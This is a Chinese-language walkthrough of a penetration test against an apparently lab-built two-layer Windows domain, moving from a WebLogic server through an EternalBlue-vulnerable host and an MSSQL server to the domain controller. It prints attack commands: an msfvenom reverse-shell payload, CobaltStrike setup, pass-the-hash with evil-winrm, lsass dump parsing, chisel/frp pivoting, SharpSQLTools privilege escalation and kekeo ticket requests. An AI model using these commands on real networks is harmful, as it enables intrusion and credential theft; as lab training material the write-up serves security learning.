渗透实战:内网域渗透
前言
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了 msf、CobaltStrike、frp、chisel、SharpSQLTools 等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
网络拓扑如下:
web 服务器
先来波端口扫描:
直接发现了内网的 ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic 只在 10.10.20.12 这个 ip 上才能解析,所以需要调整下 ip 设置,等做完 weblogic 后我们在改回 192 段。
【一>所有资源获取<一】1、200 份很多已经买不到的绝版电子书 2、30G 安全大厂内部的视频资料 3、100 份 src 文档 4、常见安全面试题 5、ctf 大赛经典题目解析 6、全套工具包
看到了 weblogic 的版本,查找下 exp,顺手先来一波 smb 信息收集。
smb 信息收集
smbmap -H 10.10.20.12
smbclient -N -L //10.10.20.12
enum4linux -a 10.10.20.12
rpcclient -U '' 10.10.20.12
smbclient -U '' -L \\10.10.20.12
weblogic 漏洞利用
知道了 weblogic 的具体版本,可以直接去查询漏洞,也可以用工具自动扫描下;
这里直接用 CVE 的漏洞来打一波;
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4 LPORT=1234 -f psh-cmd > exploit.ps1
迁移下进程,开始抓密码;
爆破一波,原来是个弱口令;
接下来换成 CS 更方便;
./teamserver 192.168.223.138 123456
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar
信息收集一波;
weblogic 数据解密
在介绍下用注册表抓取 hash 的方法;
抓取成功后拖回本地;
在本地解密;
这里有了 hash 之后,尝试下不用 msf 和 cs 来渗透;
evil-winrm -u administrator -H ccef208c6485269c20db2cad21734fe7 -i 192.168.223.165
lsass.dmp
重命名为weblogic.dmp
pypykatz lsa minidump weblogic.dmp -o weblogic.txt
并没有发现预想中存在的密码,所以下面换个其他的方法;
解密工具可以解密了;
至此,web 服务器算是搞定了,下面开始个人主机的渗透。
个人主机
永恒之蓝利用
进入内网,个人主机已经无法直接出网了,需要搭建代理。
frp 代理
服务端
客户端
这里还可以尝试下用 chisel;
./chisel server -p 8000 --reverse
./chisel client 192.168.223.138:8000 R:8100:socks
在 kali 里设置好代理配置;
proxychains nmap --script smb-vuln* -p 445 -sT -Pn 10.10.20.7 -vvv
很明显了,永恒之蓝;这里还是用 frp 代理,通过 msf 来方便点。
成功拿下个人主机,照例先抓下密码;
这里在介绍另一种抓取密码的思路,在目标机抓取后拿回本地来解密分析,在某些场合下会有奇效;
取回本地,minidump 方式解开
查看结果;
为了后续方便,我们可以用 CobaltStrike 来继续,虽然 msf 和 CS 会话可以互通,但我还是习惯直接种马后使用。这里 web 服务器已经提前在 CS 上反弹好了,精华在于 CS 的中转功能。
因为此 Win7 不出网,随后只能通过 CobaltStrike 设置中转:
先创建中转监听器:
生成木马:
利用 msf 上传并运行木马后机器上线;
信息收集一波;
可以看到个人主机后面还有 2 台机器,分别是域控服务器和数据库服务器。在进行下一步渗透之前,先需要把二级代理搭建好。
二级代理搭建
先看看 frp 如何搭建二级代理;
kali 上配置服务端;
web 服务器上配置;(一个服务端,一个客户端)
个人主机上配置客户端;
扫描测试下;
在用 chisel 搭建一个 2 级代理;
kali 上配置服务端;
web 服务器上配置客户端和服务端;
个人主机上配置客户端;
扫描测试下;
proxychains nmap -sC -sV -F -sT -Pn 10.10.10.18 -vvv
数据库服务器
这里先借助 bloodhound 来分析下域环境,以确定下一步的渗透思路,具体的安装及使用这里就不赘述了,我之前的文章有过详细介绍。
到达域管理员的最短路径;
用户:redteam.red/sqlserver 允许委托 OWA 的 cifs 服务(DC 控制器)
至此有了后续基本的渗透思路,就是通过委派攻击拿下域控,下面开始逐步实施;
根据之前端口扫描的结果,做下信息收集;
结合我们已经取得的个人主机控制权,首先当前进程是没有域管的,所以暂且放弃令牌窃取:
这里用到了约束委派攻击的知识,简单来说,在 Windows 系统中,普通用户的属性中没有委派(Delegation)这个选项卡,只有服务账号、主机账号才有。服务账号(Service Account),域内用户的一种类型,服务器运行服务时所用的账号,将服务运行起来并加入域。例如 MS SQL Server 在安装时,会在域内自动注册服务账号 SqlServiceAccount,这类账号不能用于交互式登录。(更具体知识要自己补一下)
由于我们已经拿到了一个域用户的账户密码,尝试查找约束委派的用户:
sqlserver 的用户是被设置了约束委派,但还需要密码;之前知道 1433 是开放的,爆破一波试试;
这样就可以执行 xp_cmdshell 命令了;
发现权限很小只是一个普通服务权限,下面开始提权;
使用 SharpSQLTools 开启目标 clr:(要用 Proxifier 挂上代理,就不截图了)
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
然后启用并调用命令:
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
提取成功。
下面用 msf 来进行文件上传;
上传一个 CS 的木马;
然后在用高权限来运行 cs 木马;
成功上线;
抓取下密码;
至此,数据库服务器渗透结束,下面开始对域控的渗透。
域控
经过前面的分析,这里就是纯粹的利用约束委派拿下域控。
1、利用 kekeo 请求该用户的 TGT:
TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
2、然后使用这张 TGT
3、使用 mimikatz 将 ST2 导入当前会话即可,运行 mimikatz 进行 ptt:
成功拿到域控权限;
评论